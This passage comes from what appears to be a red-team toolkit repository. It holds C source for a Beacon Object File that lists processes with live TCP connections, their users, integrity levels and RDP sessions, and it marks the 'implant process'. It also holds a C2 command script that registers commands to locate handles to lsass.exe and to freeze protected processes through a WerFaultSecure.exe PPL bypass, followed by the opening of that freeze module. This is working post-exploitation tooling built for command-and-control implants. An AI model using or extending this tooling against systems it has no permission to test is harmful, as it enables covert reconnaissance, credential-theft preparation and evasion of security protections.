		}

		if (!WTSAPI32$WTSQuerySessionInformationW(WTS_CURRENT_SERVER_HANDLE, pSessions[i].SessionId, WTSClientAddress, &lpClientAddress, &pBytesReturned)) {
			goto CleanUp;
		}

		if (pSessions[i].SessionId != 0) {
			internal_printf("%-18s%d\n", "\n<R> RDP Session:", pSessions[i].SessionId);

			if (MSVCRT$_wcsicmp(lpClientName, L"") != 0) {
				SIZE_T nameLength = KERNEL32$lstrlenW(lpClientName);
				char * convertedName = intAlloc(nameLength + 1);
				ConvertUnicodeStringToChar(lpClientName, nameLength + 1, convertedName, nameLength + 1);
				internal_printf("%-18s%s\n", "    ClientName:", convertedName);
				intFree(convertedName);
				//BeaconPrintToStreamW(L"%-18ls %ls\n", L"    ClientName:", lpClientName);
				WTSAPI32$WTSFreeMemory(lpClientName);
			}

			if (MSVCRT$_wcsicmp(lpUserName, L"") != 0) {
				SIZE_T usernameLength = KERNEL32$lstrlenW(lpUserName);
				SIZE_T domainLength = KERNEL32$lstrlenW(lpDomainName);
				char * convertedUsername = intAlloc(usernameLength + 1);
				char * convertedDomain = intAlloc(domainLength + 1);
				ConvertUnicodeStringToChar(lpUserName, usernameLength + 1, convertedUsername, usernameLength + 1);
				ConvertUnicodeStringToChar(lpDomainName, domainLength + 1, convertedDomain, domainLength + 1);
				internal_printf("%-18s%s\\%s\n", "    UserName:", convertedDomain, convertedUsername);
				intFree(convertedUsername);
				intFree(convertedDomain);
				WTSAPI32$WTSFreeMemory(lpUserName);
				WTSAPI32$WTSFreeMemory(lpDomainName);
			}

			if (pSessions[i].State == WTSActive){
				internal_printf("%-18s%s\n", "    State:", "Active");
			}
			else if (pSessions[i].State == WTSConnected){
				internal_printf("%-18s%s\n", "    State:", "Connected");
			}
			else if (pSessions[i].State == WTSConnectQuery){
				internal_printf("%-18s%s\n", "    State:", "Connecting");
			}
			else if (pSessions[i].State == WTSShadow){
				internal_printf("%-18s%s\n", "    State:", "Shadowing");
			}
			else if (pSessions[i].State == WTSDisconnected){
				internal_printf("%-18s%s\n", "    State:", "Disconnected");
			}
			else if (pSessions[i].State == WTSIdle){
				internal_printf("%-18s%s\n", "    State:", "Idle");
			}
			else if (pSessions[i].State == WTSListen){
				internal_printf("%-18s%s\n", "    State:", "Listening");
			}
			else if (pSessions[i].State == WTSReset){
				internal_printf("%-18s%s\n", "    State:", "Reset");
			}
			else if (pSessions[i].State == WTSDown){
				internal_printf("%-18s%s\n", "    State:", "Down");
			}
			else if (pSessions[i].State == WTSInit){
				internal_printf("%-18s%s\n", "    State:", "Initialization");
			}
			else {
				internal_printf("%-18s%d\n", "    State:", pSessions[i].State);
			}

			if (MSVCRT$_wcsicmp(pSessions[i].pWinStationName, L"") != 0) {
				SIZE_T nameLength = KERNEL32$lstrlenW(pSessions[i].pWinStationName);
				char * convertedName = intAlloc(nameLength + 1);
				ConvertUnicodeStringToChar(pSessions[i].pWinStationName, nameLength + 1, convertedName, nameLength + 1);
				internal_printf("%-18s%s\n", "    WinStation:", convertedName);
				//BeaconPrintToStreamW(L"%-18ls %ls\n", L"    WinStation:", pSessions[i].pWinStationName);
				intFree(convertedName);
			}

			PWTS_CLIENT_ADDRESS pAddress = (PWTS_CLIENT_ADDRESS)lpClientAddress;
			if (AF_INET == pAddress->AddressFamily) {
				internal_printf("%-18s%d.%d.%d.%d\n", "    ClientAddr:", pAddress->Address[2], pAddress->Address[3], pAddress->Address[4], pAddress->Address[5]);
			}
			else if (AF_INET6 == pAddress->AddressFamily) {
				internal_printf("%-18s%x:%x:%x:%x:%x:%x:%x:%x\n", "    ClientAddr:",
					pAddress->Address[2] << 8 | pAddress->Address[3],
					pAddress->Address[4] << 8 | pAddress->Address[5],
					pAddress->Address[6] << 8 | pAddress->Address[7],
					pAddress->Address[8] << 8 | pAddress->Address[9],
					pAddress->Address[10] << 8 | pAddress->Address[11],
					pAddress->Address[12] << 8 | pAddress->Address[13],
					pAddress->Address[14] << 8 | pAddress->Address[15],
					pAddress->Address[16] << 8 | pAddress->Address[17]);
			}
			
			WTSAPI32$WTSFreeMemory(lpClientAddress);
		}
	}

CleanUp:

	if (pSessions != NULL) {
		WTSAPI32$WTSFreeMemory(pSessions);
	}
	
	return bResult;
}

BOOL CheckConnectedProc(_In_ DWORD ProcessId) {
	BOOL bResult = FALSE;
	PMIB_TCPTABLE2 pTcpTable = NULL;
	PMIB_TCP6TABLE2 pTcp6Table = NULL;
	ULONG ulSize = 0;
	DWORD dwRetVal = 0;
	int i;
	
	pTcpTable = (MIB_TCPTABLE2 *)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, (sizeof(MIB_TCPTABLE2)));
	if (pTcpTable == NULL) {
		return bResult;
	}

	ulSize = sizeof(MIB_TCPTABLE);
	if ((dwRetVal = IPHLPAPI$GetTcpTable2(pTcpTable, &ulSize, TRUE)) == ERROR_INSUFFICIENT_BUFFER) {
		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pTcpTable);
		pTcpTable = (MIB_TCPTABLE2 *)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, (ulSize));
		if (pTcpTable == NULL) {
			return bResult;
		}
	}

	if ((dwRetVal = IPHLPAPI$GetTcpTable2(pTcpTable, &ulSize, TRUE)) == NO_ERROR) {
		for (i = 0; i < (int)pTcpTable->dwNumEntries; i++) {
			if (pTcpTable->table[i].dwOwningPid == ProcessId) {
				if (pTcpTable->table[i].dwState == MIB_TCP_STATE_ESTAB) {
					bResult = TRUE;
					goto CleanUp;
				}
			}
		}
	}

	pTcp6Table = (MIB_TCP6TABLE2 *)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, (sizeof(MIB_TCP6TABLE2)));
	if (pTcp6Table == NULL) {
		return bResult;
	}

	ulSize = sizeof(MIB_TCP6TABLE);
	if ((dwRetVal = IPHLPAPI$GetTcp6Table2(pTcp6Table, &ulSize, TRUE)) == ERROR_INSUFFICIENT_BUFFER) {
		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pTcp6Table);
		pTcp6Table = (MIB_TCP6TABLE2 *)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, (ulSize));
		if (pTcp6Table == NULL) {
			return bResult;
		}
	}

	if ((dwRetVal = IPHLPAPI$GetTcp6Table2(pTcp6Table, &ulSize, TRUE)) == NO_ERROR) {
		for (i = 0; i < (int)pTcp6Table->dwNumEntries; i++) {
			if (pTcp6Table->table[i].dwOwningPid == ProcessId) {
				if (pTcp6Table->table[i].State == MIB_TCP_STATE_ESTAB) {
					bResult = TRUE;
					goto CleanUp;
				}
			}
		}
	}

CleanUp:

	if (pTcpTable != NULL) {
		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pTcpTable);
	}

	if (pTcp6Table != NULL) {
		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pTcp6Table);
	}

	return bResult;
}

BOOL GetTcpSessions(_In_ DWORD ProcessId, _Out_ BOOL *bRDPEnabled) {
	BOOL bResult = FALSE;
	PMIB_TCPTABLE2 pTcpTable;
	ULONG ulSize = 0;
	DWORD dwRetVal = 0;
	WCHAR szLocalAddr[128];
	WCHAR szRemoteAddr[128];
	struct in_addr IpAddr;
	int i;
	
	pTcpTable = (MIB_TCPTABLE2 *)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, (sizeof(MIB_TCPTABLE2)));
	if (pTcpTable == NULL) {
		return bResult;
	}

	ulSize = sizeof(MIB_TCPTABLE);
	if ((dwRetVal = IPHLPAPI$GetTcpTable2(pTcpTable, &ulSize, TRUE)) == ERROR_INSUFFICIENT_BUFFER) {
		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pTcpTable);
		pTcpTable = (MIB_TCPTABLE2 *)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, (ulSize));
		if (pTcpTable == NULL) {
			return bResult;
		}
	}

	if ((dwRetVal = IPHLPAPI$GetTcpTable2(pTcpTable, &ulSize, TRUE)) == NO_ERROR) {
		for (i = 0; i < (int)pTcpTable->dwNumEntries; i++) {
			if (pTcpTable->table[i].dwOwningPid == ProcessId) {
				if (pTcpTable->table[i].dwState == MIB_TCP_STATE_ESTAB) {
					internal_printf("%-19s%s\n", "\n<-> Session:", "TCP");
					internal_printf("%-18s%s\n", "    State:", "ESTABLISHED");
					
					_RtlIpv4AddressToStringW RtlIpv4AddressToStringW = (_RtlIpv4AddressToStringW)
						GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlIpv4AddressToStringW");
					if (RtlIpv4AddressToStringW == NULL) {
						goto CleanUp;
					}

					IpAddr.S_un.S_addr = (u_long)pTcpTable->table[i].dwLocalAddr;
					RtlIpv4AddressToStringW(&IpAddr, szLocalAddr);
					SIZE_T addrLength = KERNEL32$lstrlenW(szLocalAddr);
					char * convertedAddr = intAlloc(addrLength + 1);
					ConvertUnicodeStringToChar(szLocalAddr, addrLength + 1, convertedAddr, addrLength + 1);
					internal_printf("%-18s%s:%d\n", "    Local Addr:", convertedAddr, WS2_32$ntohs((u_short)pTcpTable->table[i].dwLocalPort));

					IpAddr.S_un.S_addr = (u_long)pTcpTable->table[i].dwRemoteAddr;
					RtlIpv4AddressToStringW(&IpAddr, szRemoteAddr);
					SIZE_T raddrLength = KERNEL32$lstrlenW(szRemoteAddr);
					char * convertedrAddr = intAlloc(raddrLength + 1);
					ConvertUnicodeStringToChar(szRemoteAddr, raddrLength + 1, convertedrAddr, raddrLength + 1);
					internal_printf("%-18s%s:%d\n", "    Remote Addr:", convertedrAddr, WS2_32$ntohs((u_short)pTcpTable->table[i].dwRemotePort));
					intFree(convertedAddr);
					intFree(convertedrAddr);
					bResult = TRUE;
				}
				//if (WS2_32$ntohs((u_short)pTcpTable->table[i].dwLocalPort) == 3389 | WS2_32$ntohs((u_short)pTcpTable->table[i].dwRemotePort) == 3389) {
				if (WS2_32$ntohs((u_short)pTcpTable->table[i].dwLocalPort) == 3389) {
					*bRDPEnabled = TRUE;
				}
			}
		}
	}

CleanUp:

	if (pTcpTable != NULL) {
		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pTcpTable);
	}

	return bResult;
}

BOOL GetTcp6Sessions(_In_ DWORD ProcessId, _Out_ BOOL *bRDPEnabled) {
	BOOL bResult = FALSE;
	PMIB_TCP6TABLE2 pTcpTable;
	ULONG ulSize = 0;
	DWORD dwRetVal = 0;
	WCHAR szLocalAddr[128];
	WCHAR szRemoteAddr[128];
	int i;

	pTcpTable = (MIB_TCP6TABLE2 *)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, (sizeof(MIB_TCP6TABLE2)));
	if (pTcpTable == NULL) {
		return bResult;
	}

	ulSize = sizeof(MIB_TCP6TABLE);
	if ((dwRetVal = IPHLPAPI$GetTcp6Table2(pTcpTable, &ulSize, TRUE)) == ERROR_INSUFFICIENT_BUFFER) {
		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pTcpTable);
		pTcpTable = (MIB_TCP6TABLE2 *)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, (ulSize));
		if (pTcpTable == NULL) {
			return bResult;
		}
	}

	if ((dwRetVal = IPHLPAPI$GetTcp6Table2(pTcpTable, &ulSize, TRUE)) == NO_ERROR) {
		for (i = 0; i < (int)pTcpTable->dwNumEntries; i++) {
			if (pTcpTable->table[i].dwOwningPid == ProcessId) {
				if (pTcpTable->table[i].State == MIB_TCP_STATE_ESTAB) {
					internal_printf("%-19s%s\n", "\n<-> Session:", "TCP6");
					internal_printf("%-18s%s\n", "    State:", "ESTABLISHED");
					
					_RtlIpv6AddressToStringW RtlIpv6AddressToStringW = (_RtlIpv6AddressToStringW)
						GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlIpv6AddressToStringW");
					if (RtlIpv6AddressToStringW == NULL) {
						goto CleanUp;
					}

					RtlIpv6AddressToStringW(&pTcpTable->table[i].LocalAddr, szLocalAddr);
					if (MSVCRT$_wcsicmp(szLocalAddr, L"::") == 0) {
						internal_printf("%-18s[0:0:0:0:0:0:0:0]:%d\n", "    Local Addr:", WS2_32$ntohs((u_short)pTcpTable->table[i].dwLocalPort));
					}
					else {
						SIZE_T addrLength = KERNEL32$lstrlenW(szLocalAddr);
						char * convertedAddr = intAlloc(addrLength + 1);
						ConvertUnicodeStringToChar(szLocalAddr, addrLength + 1, convertedAddr, addrLength + 1);
						internal_printf("%-18s%s:%d\n", "    Local Addr:", convertedAddr, WS2_32$ntohs((u_short)pTcpTable->table[i].dwLocalPort));
						intFree(convertedAddr);
					}

					RtlIpv6AddressToStringW(&pTcpTable->table[i].RemoteAddr, szRemoteAddr);
					if (MSVCRT$_wcsicmp(szRemoteAddr, L"::") == 0) {
						internal_printf("%-18s[0:0:0:0:0:0:0:0]:%d\n", "    Local Addr:", WS2_32$ntohs((u_short)pTcpTable->table[i].dwLocalPort));
					}
					else {
						SIZE_T raddrLength = KERNEL32$lstrlenW(szRemoteAddr);
						char * convertedrAddr = intAlloc(raddrLength + 1);
						ConvertUnicodeStringToChar(szRemoteAddr, raddrLength + 1, convertedrAddr, raddrLength + 1);
						internal_printf("%-18s%s:%d\n", "    Local Addr:", convertedrAddr, WS2_32$ntohs((u_short)pTcpTable->table[i].dwLocalPort));
						intFree(convertedrAddr);
					}

					bResult = TRUE;
				}
				if (WS2_32$ntohs((u_short)pTcpTable->table[i].dwLocalPort) == 3389) {
					*bRDPEnabled = TRUE;
				}
			}
		}
	}

CleanUp:

	if (pTcpTable != NULL) {
		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pTcpTable);
	}
	
	return bResult;
}


VOID go()
{

    if(!bofstart())
    {
        return;
    }
    NTSTATUS status;
	BOOL bIsWoW64 = FALSE;
	PSYSTEM_PROCESSES pProcInfo = NULL;
	LPVOID pProcInfoBuffer = NULL;
	SIZE_T procInfoSize = 0x10000;
	ULONG uReturnLength = 0;
	FILETIME ftCreate;
	SYSTEMTIME stUTC, stLocal;
	ULONG ulPid = GetPid();
	DWORD SessionID;
	
	_RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitUnicodeString");
	if (RtlInitUnicodeString == NULL) {
		BeaconPrintf(CALLBACK_ERROR, "GetProcAddress failed.");
		return;
	}

	_RtlEqualUnicodeString RtlEqualUnicodeString = (_RtlEqualUnicodeString)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlEqualUnicodeString");
	if (RtlEqualUnicodeString == NULL) {
		BeaconPrintf(CALLBACK_ERROR, "GetProcAddress failed.");
		return;
	}

#if defined(WOW64)
	_RtlWow64EnableFsRedirectionEx RtlWow64EnableFsRedirectionEx = (_RtlWow64EnableFsRedirectionEx)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlWow64EnableFsRedirectionEx");
	if (RtlWow64EnableFsRedirectionEx == NULL) {
		BeaconPrintf(CALLBACK_ERROR, "GetProcAddress failed.");
		return;
	}

	bIsWoW64 = IsProcessWoW64(NtCurrentProcess());
	if (bIsWoW64) {
		PVOID OldValue = NULL;
		status = RtlWow64EnableFsRedirectionEx((PVOID)TRUE, &OldValue);
	}
#endif

	if (IsElevated()) {
		SetDebugPrivilege();
	}

	do {
		pProcInfoBuffer = NULL;
		status = ZwAllocateVirtualMemory(NtCurrentProcess(), &pProcInfoBuffer, 0, &procInfoSize, MEM_COMMIT, PAGE_READWRITE);
		if (status != STATUS_SUCCESS) {
			BeaconPrintf(CALLBACK_ERROR, "Failed to allocate memory.");
			return;
		}

		status = ZwQuerySystemInformation(SystemProcessInformation, pProcInfoBuffer, (ULONG)procInfoSize, &uReturnLength);
		if (status == STATUS_INFO_LENGTH_MISMATCH) {
			ZwFreeVirtualMemory(NtCurrentProcess(), &pProcInfoBuffer, &procInfoSize, MEM_RELEASE);
			procInfoSize += uReturnLength;
		}

	} while (status != STATUS_SUCCESS);

	pProcInfo = (PSYSTEM_PROCESSES)pProcInfoBuffer;
LOOP:	do {
		if (pProcInfo->NextEntryDelta == 0) {
			break;
		}
		pProcInfo = (PSYSTEM_PROCESSES)(((LPBYTE)pProcInfo) + pProcInfo->NextEntryDelta);
		
		if (!CheckConnectedProc(HandleToULong(pProcInfo->ProcessId))) {
			if (pProcInfo->NextEntryDelta == 0) {
				break;
			}
			goto LOOP;
		}

        internal_printf("\n--------------------------------------------------------------------\n");
		if (HandleToULong(pProcInfo->ProcessId) == ulPid){
			SIZE_T pnLength = pProcInfo->ProcessName.Length;
            char * convertedPN = intAlloc(pProcInfo->ProcessName.Length + 1);
            ConvertUnicodeStringToChar(pProcInfo->ProcessName.Buffer, pnLength + 1, convertedPN, pnLength + 1);
            internal_printf("%-18s%s %s\n", "[I] ProcessName:", convertedPN, "(implant process)");
            intFree(convertedPN);
        }
		else{
            SIZE_T pnLength = pProcInfo->ProcessName.Length;
            char * convertedPN = intAlloc(pProcInfo->ProcessName.Length + 1);
            ConvertUnicodeStringToChar(pProcInfo->ProcessName.Buffer, pnLength + 1, convertedPN, pnLength + 1);
            internal_printf("%-18s%s\n", "[I] ProcessName:", convertedPN);
            intFree(convertedPN);
        }
        internal_printf("%-18s%lu\n", "    ProcessID:", HandleToULong(pProcInfo->ProcessId));
        internal_printf("%-18s%lu ", "    PPID:", HandleToULong(pProcInfo->InheritedFromProcessId));

		PSYSTEM_PROCESSES pParentInfo = (PSYSTEM_PROCESSES)pProcInfoBuffer;
		do {
			pParentInfo = (PSYSTEM_PROCESSES)(((LPBYTE)pParentInfo) + pParentInfo->NextEntryDelta);

			if (HandleToULong(pParentInfo->ProcessId) == HandleToULong(pProcInfo->InheritedFromProcessId)) {
				SIZE_T pnLength = pParentInfo->ProcessName.Length;
                char * convertedPN = intAlloc(pParentInfo->ProcessName.Length + 1);
                ConvertUnicodeStringToChar(pParentInfo->ProcessName.Buffer, pnLength + 1, convertedPN, pnLength + 1);
                internal_printf("%s\n", convertedPN);
                intFree(convertedPN);
				break;
			}
			else if (pParentInfo->NextEntryDelta == 0) {
				internal_printf("(Non-existent process)\n");
				break;
			}

		} while (pParentInfo);

		ftCreate.dwLowDateTime = pProcInfo->CreateTime.LowPart;
		ftCreate.dwHighDateTime = pProcInfo->CreateTime.HighPart;
		
		// Convert the Createtime to local time.
		KERNEL32$FileTimeToSystemTime(&ftCreate, &stUTC);
		if (KERNEL32$SystemTimeToTzSpecificLocalTime(NULL, &stUTC, &stLocal)) {
			internal_printf("%-18s%02d/%02d/%d %02d:%02d\n", "    CreateTime:", stLocal.wDay, stLocal.wMonth, stLocal.wYear, stLocal.wHour, stLocal.wMinute);
		}

		if (KERNEL32$ProcessIdToSessionId(HandleToULong(pProcInfo->ProcessId), &SessionID)) {
			internal_printf("%-18s%d\n", "    SessionID:", SessionID);
		}
		if (HandleToULong(pProcInfo->ProcessId) == 4) {
			EnumKernel();
		}
		else{
			EnumFileProperties(pProcInfo->ProcessId, NULL);
		}
		
		HANDLE hProcess = NULL;
		OBJECT_ATTRIBUTES ObjectAttributes;
		InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL);
		CLIENT_ID uPid = { 0 };

		uPid.UniqueProcess = pProcInfo->ProcessId;
		uPid.UniqueThread = (HANDLE)0;

		status = ZwOpenProcess(&hProcess, PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, &ObjectAttributes, &uPid);
		if (hProcess != NULL) {
			LPWSTR lpwProcUser = GetProcessUser(hProcess, FALSE, TRUE, TRUE);
			if (lpwProcUser != NULL) {
                SIZE_T pnLength = KERNEL32$lstrlenW(lpwProcUser);
                char * convertedPN = intAlloc(pnLength + 1);
                ConvertUnicodeStringToChar(lpwProcUser, pnLength + 1, convertedPN, pnLength + 1);
                internal_printf("%-18s%s\n", "    UserName:", convertedPN);
                intFree(convertedPN);
				KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, lpwProcUser);
			}

			DWORD dwIntegrityLevel = IntegrityLevel(hProcess); // Should be switch but this fails on older Mingw compilers...
			if (dwIntegrityLevel == Untrusted) {
				internal_printf("%-18s%s\n", "    Integrity:", "Untrusted");
			}
			else if (dwIntegrityLevel == LowIntegrity) {
				internal_printf("%-18s%s\n", "    Integrity:", "Low");
			}
			else if (dwIntegrityLevel == MediumIntegrity) {
				internal_printf("%-18s%s\n", "    Integrity:", "Medium");
			}
			else if (dwIntegrityLevel == HighIntegrity) {
				internal_printf("%-18s%s\n", "    Integrity:", "High");
			}
			else if (dwIntegrityLevel == SystemIntegrity) {
				internal_printf("%-18s%s\n", "    Integrity:", "System");
			}
			else if (dwIntegrityLevel == ProtectedProcess) {
				internal_printf("%-18s%s\n", "    Integrity:", "Protected Process");
			}

			if (bIsWoW64) {
				EnumPebFromWoW64(hProcess);
			}
			else{
				EnumPeb(hProcess);
			}
	
			// Close the Process Handle
			ZwClose(hProcess);
		}

		BOOL bRDPEnabled = FALSE;
		GetTcpSessions(HandleToULong(pProcInfo->ProcessId), &bRDPEnabled);
		GetTcp6Sessions(HandleToULong(pProcInfo->ProcessId), &bRDPEnabled);
		if (bRDPEnabled) {
			EnumRDPSessions();
		}

		if (pProcInfo->NextEntryDelta == 0) {
			break;
		}
	} while (pProcInfo);


CleanUp:

	if (pProcInfoBuffer != NULL) {
		ZwFreeVirtualMemory(NtCurrentProcess(), &pProcInfoBuffer, &procInfoSize, MEM_RELEASE);
	}

	if (g_lpwReadBuf != (LPWSTR)1) {
		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, g_lpwReadBuf);
	}

    printoutput(TRUE);
    bofstop();
};

================================================
FILE: Process-BOF/process.axs
================================================
var metadata = {
    name: "Process-BOF",
    description: "Situational awareness of processes, modules, and services"
};


var _cmd_findobj_module = ax.create_command("module", "Identify processes which have a certain module loaded", "findobj module clr.dll");
_cmd_findobj_module.addArgString("module", true, "Module name to search for (e.g. clr.dll, amsi.dll, winhttp.dll)");
_cmd_findobj_module.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let module = parsed_json["module"];

    let bof_params = ax.bof_pack("wstr", [module]);
    let bof_path = ax.script_dir() + "_bin/findmodule." + ax.arch(id) + ".o";
    let message = `Task: find process with module ${module}`;

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});
var _cmd_findobj_prochandle = ax.create_command("prochandle", "Identify processes with a specific process handle in use", "findobj prochandle lsass.exe");
_cmd_findobj_prochandle.addArgString("proc", true, "Process name to search handles for (e.g. lsass.exe)");
_cmd_findobj_prochandle.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let proc = parsed_json["proc"];

    let bof_params = ax.bof_pack("wstr", [proc]);
    let bof_path = ax.script_dir() + "_bin/findprochandle." + ax.arch(id) + ".o";
    let message = `Task: find processes with open handle ${proc}`;

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});
var cmd_findobj = ax.create_command("findobj", "Enumerate processes for specific objects");
cmd_findobj.addSubCommands([_cmd_findobj_module, _cmd_findobj_prochandle]);


var _cmd_process_conn = ax.create_command("conn", "Shows detailed information from processes with established TCP and RDP connections", "process conn");
_cmd_process_conn.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {

    let bof_path = ax.script_dir() + "_bin/psc." + ax.arch(id) + ".o";
    let message = "Task: List process connection (BOF)";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, message);
});

var cmd_process = ax.create_command("process", "Shows detailed information from processes");
cmd_process.addSubCommands([_cmd_process_conn]);

var cmd_process_x = ax.create_command("process-x", "Shows detailed information from processes");
cmd_process_x.addSubCommands([_cmd_process_conn]);


var _cmd_procfreeze_freeze = ax.create_command("freeze", "Freeze a target process using PPL bypass via WerFaultSecure.exe");
_cmd_procfreeze_freeze.addArgInt("pid", true, "Process ID to freeze");
_cmd_procfreeze_freeze.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let pid = parseInt(parsed_json["pid"]);

    let bof_params = ax.bof_pack("int,int", [1, pid]);
    let bof_path = ax.script_dir() + "_bin/procfreeze." + ax.arch(id) + ".o";
    let message = `Task: Freeze process ${pid}`;

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});

var _cmd_procfreeze_unfreeze = ax.create_command("unfreeze", "Unfreeze a previously frozen process");
_cmd_procfreeze_unfreeze.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {

    let bof_params = ax.bof_pack("int,int", [2, 0]);
    let bof_path = ax.script_dir() + "_bin/procfreeze." + ax.arch(id) + ".o";
    let message = "Task: Unfreeze process";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});

var cmd_procfreeze = ax.create_command("procfreeze", "Process freeze/unfreeze using PPL bypass (WerFaultSecure.exe)");
cmd_procfreeze.addSubCommands([_cmd_procfreeze_freeze, _cmd_procfreeze_unfreeze]);


var group_process = ax.create_commands_group("Process-BOF", [cmd_findobj, cmd_process, cmd_procfreeze]);
ax.register_commands_group(group_process, ["beacon", "gopher"], ["windows"], []);

var group_process_x = ax.create_commands_group("Process-BOF-X", [cmd_findobj, cmd_process_x, cmd_procfreeze]);
ax.register_commands_group(group_process_x, ["kharon"], ["windows"], []);

================================================
FILE: Process-BOF/procfreeze/procfreeze.c
================================================
#include <windows.h>
#include <winternl.h>
#include "beacon.h"

#ifndef PROC_THREAD_ATTRIBUTE_PROTECTION_LEVEL
#define PROC_THREAD_ATTRIBUTE_PROTECTION_LEVEL 0x0002000B
#endif


DECLSPEC_IMPORT WINBOOL WINAPI KERNEL32$CloseHandle(HANDLE);
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$OpenProcess(DWORD, WINBOOL, DWORD);
DECLSPEC_IMPORT WINBOOL WINAPI KERNEL32$TerminateProcess(HANDLE, UINT);
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateFileW(LPCWSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateEventW(LPSECURITY_ATTRIBUTES, WINBOOL, WINBOOL, LPCWSTR);
DECLSPEC_IMPORT WINBOOL WINAPI KERNEL32$InitializeProcThreadAttributeList(LPPROC_THREAD_ATTRIBUTE_LIST, DWORD, DWORD, PSIZE_T);
DECLSPEC_IMPORT WINBOOL WINAPI KERNEL32$UpdateProcThreadAttribute(LPPROC_THREAD_ATTRIBUTE_LIST, DWORD, DWORD_PTR, PVOID, SIZE_T, PVOID, PSIZE_T);
DECLSPEC_IMPORT WINBOOL WINAPI KERNEL32$CreateProcessW(LPCWSTR, LPWSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, WINBOOL, DWORD, LPVOID, LPCWSTR, LPSTARTUPINFOW, LPPROCESS_INFORMATION);
DECLSPEC_IMPORT VOID WINAPI KERNEL32$DeleteProcThreadAttributeList(LPPROC_THREAD_ATTRIBUTE_LIST);
DECLSPEC_IMPORT VOID WINAPI KERNEL32$Sleep(DWORD);
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetCurrentProcess(VOID);
DECLSPEC_IMPORT HMODULE WINAPI KERNEL32$GetModuleHandleA(LPCSTR);
DECLSPEC_IMPORT FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE, LPCSTR);
DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetLastError(VOID);
DECLSPEC_IMPORT WINBOOL WINAPI KERNEL32$DeleteFileW(LPCWSTR);
DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE, DWORD, SIZE_T);
DECLSPEC_IMPORT WINBOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, LPVOID);
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetProcessHeap(VOID);
DECLSPEC_IMPORT WINBOOL WINAPI KERNEL32$GetExitCodeProcess(HANDLE, LPDWORD);
DECLSPEC_IMPORT DWORD WINAPI KERNEL32$SetFilePointer(HANDLE, LONG, PLONG, DWORD);
DECLSPEC_IMPORT WINBOOL WINAPI KERNEL32$WriteFile(HANDLE, LPCVOID, DWORD, LPDWORD, LPOVERLAPPED);
DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetFileSize(HANDLE, LPDWORD);
DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetProcessId(HANDLE);

DECLSPEC_IMPORT WINBOOL WINAPI ADVAPI32$OpenProcessToken(HANDLE, DWORD, PHANDLE);
DECLSPEC_IMPORT WINBOOL WINAPI ADVAPI32$LookupPrivilegeValueW(LPCWSTR, LPCWSTR, PLUID);
DECLSPEC_IMPORT WINBOOL WINAPI ADVAPI32$AdjustTokenPrivileges(HANDLE, WINBOOL, PTOKEN_PRIVILEGES, DWORD, PTOKEN_PRIVILEGES, PDWORD);

DECLSPEC_IMPORT int __cdecl MSVCRT$_snwprintf(wchar_t*, size_t, const wchar_t*, ...);
DECLSPEC_IMPORT void* __cdecl MSVCRT$memset(void*, int, size_t);

#ifndef STATUS_INFO_LENGTH_MISMATCH
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004)
#endif

#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif

#ifndef SE_DEBUG_NAME_W
#define SE_DEBUG_NAME_W L"SeDebugPrivilege"
#endif

#ifndef EXTENDED_STARTUPINFO_PRESENT
